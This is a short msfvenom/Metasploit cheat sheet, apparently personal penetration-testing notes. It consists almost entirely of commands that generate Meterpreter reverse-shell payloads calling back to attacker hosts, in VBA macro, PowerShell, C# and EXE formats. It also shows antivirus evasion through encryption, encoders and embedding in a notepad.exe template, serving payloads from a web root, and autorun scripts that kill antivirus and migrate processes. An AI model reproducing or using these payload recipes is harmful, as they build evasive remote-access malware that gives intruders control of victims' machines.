# msfvenom

### Some shellcode types

#### vba+macro

```
msfvenom -p windows/meterpreter/reverse_https LHOST=192.168.49.57 LPORT=443 EXITFUNC=thread -f vbapplication -o test_vba
```

#### PS1

```
msfvenom -p windows/meterpreter/reverse_https LHOST=ipaddress LPORT=443 EXITFUNC=thread -f ps1 -o test_ps
msfvenom -p windows/x64/meterpreter/reverse_https LHOST=192.168.1.74 LPORT=443 EXITFUNC=thread -f ps1
```

#### psh

```
msfvenom -p windows/meterpreter/reverse_https LHOST=ipaddress LPORT=443 EXITFUNC=thread -f psh -o run.txt
```

#### elf

```
linux/x64/meterpreter/reverse_tcp
```

#### csharp

```
msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=192.168.49.57 LPORT=443 EXITFUNC=thread -f csharp
```

#### Encoding, encryption, bundling

```
msfvenom -p windows/x64/meterpreter/reverse_https LHOST=192.168.49.71 LPORT=4433 --encrypt aes256 --encrypt-key fdgdgj93jf43uj983uf498f43 -f exe -o 4433.exe   // works
msfvenom -p windows/x64/meterpreter/reverse_https LHOST=192.168.176.134 LPORT=443 -e x64/zutto_dekiru -x /home/kali/notepad.exe -f exe -o /var/www/html/met64_notepad.exe
msfvenom -p windows/x64/meterpreter/reverse_https LHOST=192.168.119.120 LPORT=443 --encrypt aes256 --encrypt-key fdgdgj93jf43uj983uf498f43 -f exe -o /var/www/html/met64_aes.exe
msfvenom -p windows/meterpreter/reverse_https LHOST=192.168.119.120 LPORT=443 -e x86/shikata_ga_nai -f exe -o /var/www/html/met.exe
msfvenom -p windows/x64/meterpreter/reverse_https LHOST=192.168.119.120 LPORT=443 -e x64/zutto_dekiru -f exe -o /var/www/html/met64_zutto.exe

// option fragments
-e x86/shikata_ga_nai -i 3
--smallest
--encrypt rc4 --encrypt-key thisisakey
-e x64/zutto_dekiru
-e x86/shikata_ga_nai
```

#### Long-lived (stage encoding)

```
set EnableStageEncoding true
set StageEncoder x64/zutto_dekiru
```

#### script

```
set autorunscript post/windows/manage/killav
set autorunscript post/windows/manage/migrate
set autorunscript post/windows/gather/checkvm
```

#### Persistence

```
execute -H -f notepad
```

### Matching paths

```
PsExec.exe -s -i C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell_ise.exe   x86
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell_ise.exe   x64, run directly, but the payload must be x64
```